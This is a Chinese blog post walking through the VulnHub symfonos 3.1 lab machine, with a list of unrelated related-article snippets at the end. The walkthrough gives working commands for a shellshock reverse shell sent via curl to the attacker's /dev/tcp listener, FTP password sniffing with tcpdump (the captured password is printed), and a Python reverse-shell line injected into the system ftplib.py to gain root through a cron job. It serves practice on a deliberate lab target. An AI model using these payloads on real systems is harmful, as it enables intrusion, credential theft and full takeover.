vulnhub symfonos: 3.1

最新推荐文章于 2022-06-30 01:33:58 发布
最新推荐文章于 2022-06-30 01:33:58 发布
阅读量1.1k 收藏 4
点赞数
分类专栏: vulnhub 文章标签: shellshock pspy tcpdump vi python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/elephantxiang/article/details/124183085
版权

渗透思路:

nmap扫描----gobuster扫描网站目录----shellshock获得反弹shell----pspy发现定时ftp连接----tcpdump获取用户密码----vi修改python脚本获得root权限反弹shell

环境信息:

靶机:192.168.101.56

攻击机:192.168.101.34

具体步骤:

1、nmap扫描

sudo nmap -sV -sC -p- 192.168.101.56

扫描到21端口(ftp)、22端口(ssh)和80端口(http)

2、gobuster扫描网站目录(不小心进入兔子洞)

浏览器访问http://192.168.101.56/,发现只是一张图片

gobuster扫描网站目录,字典用/usr/share/wordlists/dirb/big.txt

​gobuster dir -u http://192.168.101.56/ -w /usr/share/wordlists/dirb/big.txt

扫到一个/gate目录可能有点东西

浏览器访问http://192.168.101.56/gate/,又是一张图

继续gobuster扫描http://192.168.101.56/gate/,换个字典/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

​gobuster dir -u http://192.168.101.56/gate/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

扫描到/cerberus

浏览器访问http://192.168.101.56/gate/cerberus/,又是一张图

继续gobuster扫描,换回原来的字典/usr/share/wordlists/dirb/big.txt

​gobuster dir -u http://192.168.101.56/gate/cerberus/ -w /usr/share/wordlists/dirb/big.txt

扫描到/tartarus

浏览器访问http://192.168.101.56/gate/cerberus/tartarus/,还是一张图,右键查看元素的时候,发现有注释"The underworld can be cruel... but it can also be misleading. ",emmmmm不知道是不是在暗示这里是兔子洞……

继续扫描目录,用字典/usr/share/wordlists/dirb/big.txt

​gobuster dir -u http://192.168.101.56/gate/cerberus/tartarus -w /usr/share/wordlists/dirb/big.txt

这次大丰收,扫到了/research、/hermes和/charon,但其实只有/research可以访问

浏览器访问http://192.168.101.56/gate/cerberus/tartarus/research发现都是文字,也没注释,也没功能,也没啥敏感信息,再往下扫描目录也扫描不出东西了,似乎真是兔子洞……

3、shellshock获得反弹shell

回到最初的起点,一开始扫描http://192.168.101.56/的时候还扫描到了/cgi-bin,接下来扫描一下这个目录,用字典/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

​gobuster dir -u http://192.168.101.56/cgi-bin/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

扫描到了/underworld

浏览器访问http://192.168.101.56/cgi-bin/underworld

再访问一次,发现显示的结果有变化,似乎是实时更新的,并且看起来像是命令行的执行结果

在百度中查找users,load average,找到的结果显示浏览器上的显示可能是命令w或者uptime的结果

在攻击机上尝试执行w,发现比浏览器显示多一些行

攻击机上执行uptime,输出结果的格式和浏览器显示是一致的。

既然http://192.168.101.56/cgi-bin/underworld执行系统命令,那它有可能会有shellshock漏洞(参考资料:什么是ShellShock攻击? - 知乎),尝试一下:

攻击机上开两个终端,一个nc监听6666端口

nc -nlvp 6666

另一个输入

​curl -A "() { :;};/bin/bash -i &>/dev/tcp/192.168.101.34/6666 <&1" http://192.168.101.56/cgi-bin/underworld

得到了cerberus的反弹shell

4、利用pspy发现定时ftp连接

在操作系统上找了半天没找到点东西,准备用pspy看看有没有暂时看不到的定时任务

从github上下载pspy:https://github.com/DominicBreuker/pspy

保存到攻击机上,并用python起http服务

python2 -m SimpleHTTPServer 443

靶机上下载pspy到cerberus家目录

​wget http://192.168.101.56:443/pspy64s

并赋予pspy可执行权限

chmod +x pspy64s

执行pspy

./pspy64s

可以看到每2分钟有一次ftp连接,有可能是执行/bin/sh -c /usr/bin/python2.7 /opt/ftpclient/ftpclient.py导致的

可惜的是当前用户没有/opt/ftpclient/ftpclient.py的权限,不能通过修改这个脚本提权了。

不过既然每2分钟有一次ftp连接,并且ftp是明文传输的,那么监听ftp端口就可以获取到ftp用户密码了。

5、tcpdump监听获取hades用户ftp/ssh密码

监听之前需要知道靶机有哪些端口

ip address

查看到有lo和ens33两个端口

由于定时任务是靶机本机上执行的,因此比较有可能是与lo端口(127.0.0.1)进行通讯,所以先用tcpdump监听lo的21号端口

tcpdump -i lo port 21

(备注:这边万一遇到权限问题,可以把靶机删掉重装一下,比如我就遇到这个问题,而上图是重装靶机后截图的,所以和之前的靶机ip不一样)

等待一会儿之后获取到了hades的ftp密码PTpZTfU4vxgzvRBE

幸运的是,hades的ssh密码和ftp密码是一样的~

6、vi修改python脚本获得root权限的反弹shell

hades这儿也是一无所获,想起来之前用pspy检测到的定时任务涉及到一个python脚本/opt/ftpclient/ftpclient.py,当时cerberus没权限,来看看hades有没有权限

hades用户是hades组的,而hades组只有查看该文件的权限。

另外解释一下,虽然上图中看起来任何用户都可以查看/opt/ftpclient/ftpclient.py,但由于除了root用户以及hades组的用户,其他用户对该文件上级目录/opt/ftpclient/没有任何权限,因此对该文件也没有任何权限。

查看一下/opt/ftpclient/ftpclient.py的内容,发现用到了ftplib.FTP

查找一下ftplib

find / -name "*ftplib*" 2>/dev/null

修改/usr/lib/python2.7/ftplib.py的内容

vi /usr/lib/python2.7/ftplib.py

增加python反弹shell

import pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.101.34",5555));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh");

我是直接添加在import模块操作之后的

然后删除/usr/lib/python2.7/ftplib.pyc,不然运行的时候直接调用.pyc文件就不执行.py文件了

rm /usr/lib/python2.7/ftplib.pyc

攻击机上nc监听5555端口

nc -nlvp 5555

然后等着就好了,过最多两分钟反弹shell就带着root权限来了。

仙女象
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SYMFONOS3.1:Desarrollo del CTF SYMFONOS 3.1
04-05
SYMFONOS3.1 Desarrollo del CTF SYMFONOS 3.1 1.虚拟机配置 虚拟的Descargar lamáquina: ://www.vulnhub.com/entry/symfonos-31,332/ 重要事项:3.1版本的问题否不能完全解决。 2.埃斯卡尼奥·德波多斯 nmap -n -P0 -p- -sC -sV -O -T5 -oA full 10.10.10.153 Nmap scan report for 10.10.10.153 Host is up (0.00047s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.5b 22/tcp open ssh OpenSSH 7.
oscp——symfonos:3
王嘟嘟的博客
01-16 1万+
0x00 前言 这个是练习的第6个机子。 目标地址 https://www.vulnhub.com/entry/symfonos-3,332/ 参考文章 https://www.wandouip.com/t5i400700/ https://cloud.tencent.com/developer/article/1523899 0x01 实验 1.信息收集 1.1 ip收集 1.2 开放端口 ...
Symfonos:3 Vulnhub Walkthrough
Globalizationa的博客
08-23 258
主机扫描: ╰─ nmap -p1-65535 -sV -A -sT 10.10.202.130 Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-04 15:20 CSTNmap scan report for 10.10.202.130Host is up (0.00085s latency).Not shown: 65532 closed portsPORT STATE SERVICE VERSION21/tcp open ftp ...
Vulnhub靶机 Symfonos 3
菜浪马废的博客
09-26 415
shellshock漏洞 验证一下 上传pspy32扫到的进程 下载文件 wireshark进行分析 得到账号密码 登录成功 修改脚本 等待一会得到root权限
Vulnhub靶场之symfonos:1
SoporAeternus12的博客
04-16 3358
靶场的下载地址: 信息收集 nmap -sP 192.168.157.145/24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-16 09:45 EDT Nmap scan report for 192.168.157.2 Host is up (0.00055s latency). Nmap scan report for 192.168.157.158 Host is up (0.00016s latency). Nmap scan repor
mcr.microsoft.com/dotnet/core/aspnet:3.1-buster-slim
08-24
.Net Core 3.1 项目Docker 容器化必须的依赖镜像 同时附上百度网盘下载地址 链接:https://pan.baidu.com/s/1K4GZJ_MzG_n6wAsKl4DFEQ 提取码:b30i
k8s.gcr.io/pause:3.1镜像包
03-06
kubernetes的k8s.gcr.io/pause:3.1镜像包,版本为3.1。文件是pause_3_1.tar
k8s.gcr.io/pause:3.1
11-01
使用方法请关注blog: https://blog.csdn.net/wenwst 导入命令: #docker load < pause.3.1.tar # docker tag da86e6ba6ca1 k8s.gcr.io/pause:3.1
***常用兵器之扫描器篇
weixin_33811961的博客
03-29 133
  刀,兵器谱上排名第六。   刀;   一把好刀,光亮如雪;   刃;   一抹利刃,吹发即断;   ***手中的扫描器如同刺客手中之刀,杀人、保命;***、补漏。   如果一个***手中没有一两个扫描器,那么他算不上是一个***,至少他是一个手里没有“刀”的***。没有“刀”的***是难以生存的……】   “前辈,您为何如此看好扫描器?为什么***必须要有扫描器?”   ...
pspyPython功率谱代码
02-14
pspy pspy是用于计算CMB功率谱和协方差矩阵的宇宙学代码。 有关如何使用该软件包的一组介绍性示例,请参见python示例笔记本。 免费软件:BSD许可证 pspy文档: : pspy 。 科学文件: : 正在安装 要安装,您将需要具有或安装numpy 。 然后跑 $ pip install pspy [--user] 如果您打算开发pspy ,最好通过执行以下操作来检出最新版本: $ git clone https://github.com/simonsobs/pspy.git /where/to/clone 然后你就可以安装pspy通过图书馆和它的依赖 $ pip install -e /where/to/clone -e选项使开发人员可以在pspy目录中进行更改,而不必在每次更改时都重新安装。 安装说明pspy在NERSC可在 。 在上提供了在MAC
vulnhub之cereal
weixin_54431413的博客
06-30 737
分析了扫描到的各个端口的功能,进行信息收集,dirb爆破,gobuster vhost爆破子域名,之后dirbuster爆破备份文件,代码审计,利用反序列化漏洞,RCE,突破边界,之后内网信息收集,常规方式无效,进程监听,找到可疑sh进程,最后进行分析,chown特性,构造软链接进行属组的更改,新建root用户进行提权。...
Citrix XenServer iscsi SR 无法连接
Jeffrey Lin的专栏
02-28 3698
如上图,iscsi无法连接,显示错误,重新连接,只能看到discover iqns,无法看到target LUN; 检查发现,最近做的改动为xenServer 初始ip为192.168.101.50,后由于原因ip改为了192.168.101.56 在iscsi管理程序上发现,标示符为ip地址: 修改ip地址为192.168.101.56,问题解决。
正在连接192.168.56.101...无法打开到主机的连接。 在端口 1521: 连接失败
weixin_36735788的博客
08-24 3669
我是在VirtualBox上的虚拟机安装了oralce,然后想在主机上面连接oralce,发现连接不上。我的虚拟机采用双网卡模式,一个是桥接模式,一个是Host-Only模式。采用桥接模式是为了可以与访问网上的资源,但为啥要设置双网卡呢。因为桥接模式的IP所在的局域网不一样的话,ip也会随着改变的。我想要一个固定的虚拟机的ip,同时又想访问网上的资源,所以采用了双网卡的模式。关于VirtualBox虚拟机的网络设置,可以参考一下文章: VirtualBox虚拟机网络设置(四种方式) 下面是我...
VulnHub系列』symfonos: 3-Walkthrough
ins1ght的博客
10-16 999
靶机发布日期:2019年7月20日。经过了曲折的页面、目录枚举,发现shellshock漏洞,随后使用MSF获取到了shell。提权过程中先后使用手工、脚本对信息进行收集,最后使用pspy发现了root权限运行的ftpclient.py脚本。tcpdump嗅探到ftp服务的用户名、密码,随后登录SSH,修改ftpclient.py脚本获得root权限。
aws python lambda_PSPy 一个简单的Python 2.7 AWS Lambda函数
weixin_39528219的博客
12-04 169
AWS PowerShell Python Lambda - PSPyAWS PowerShell Python Lambda, or PSPy for short, is a simple Python 2.7 AWS Lambda function designed to execute the PowerShell binary and marshal input/output to Pow...
真的敢耗时1个月10万字解决Linux内网渗透
aa119101的博客
05-25 3153
Linux虽然没有域环境,但是当我们拿到一台Linux 系统权限,难道只进行一下提权,捕获一下敏感信息就结束了吗?显然不只是这样的。本片文章将从拿到一个Linux shell开始,介绍Linux内网渗透技术,分为容器逃逸、Linux提权、Linux信息收集、Linux隧道技术、Linux横向移动、Linux权限维持、Linux痕迹清理几个部分。 容器逃逸 容器逃逸的应用主要是,拿到shell之后,发现是docker环境,要进一步渗透,就必须逃逸到宿主机。 容器逃逸方法见: https://www.cn
渗透靶场——HackMyVM:Family
tlovejr的博客
03-21 1032
部署环境: 提供镜像文件后,直接用虚拟机打开即可,在这里和以往有些不同,我采取了两个虚拟机软件的形式,一个是VMware,另个就是就是vbox,连接的方式都是桥接即可 Kali机ip地址:192.168.1.5 靶机ip地址:192.168.1.6 1、扫描存活主机ip地址 arp-scan -l 2、扫描一下存活端口 nmap -v -A -p- 192.168.1.6 发现只有22端口还有80这个web端口开放,直接对80端口进行访问 3、对web80端口开始进行渗透 首页里面有一个wordp
DirBuster使用教程
热门推荐
Deeeelete的博客
01-28 1万+
工具是kali自带,多用于网站的后台扫描 工具路径:/usr/share/dirbuster cd /usr/share/dirbuster进入路径后ls查看,会看到目录下的jar文件: 2. java -jar DirBuster-1.0-RC1.jar 打开jar文件 3. 出现可视化窗口,配置很多,现在我们先填写空白的输入框部分,这里我们在第一个输入框填写扫描网站的url地址 4....
是什么意思,可以下载两个版本的SDK一起放在DevEco Studio吗Solution: Go to Tools > SDK Manager > SDKs > HarmonyOS, download the Toolchains:3.1.9.7,ArkTS:3.1.9.7 SDK, and accept the license agreement.
最新发布
06-06
这个 Solution 是解决如何在 DevEco Studio 中下载 HarmonyOS 的 SDK 的问题的。它的意思是,你可以通过在 DevEco Studio 的 SDK 管理器中下载 HarmonyOS 的两个版本的 SDK(Toolchains:3.1.9.7 和 ArkTS:3.1.9.7),并同意许可协议,然后将它们同时安装在 DevEco Studio 中。这样做可以让你在开发应用程序时更加灵活,根据需要选择使用不同版本的 SDK。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值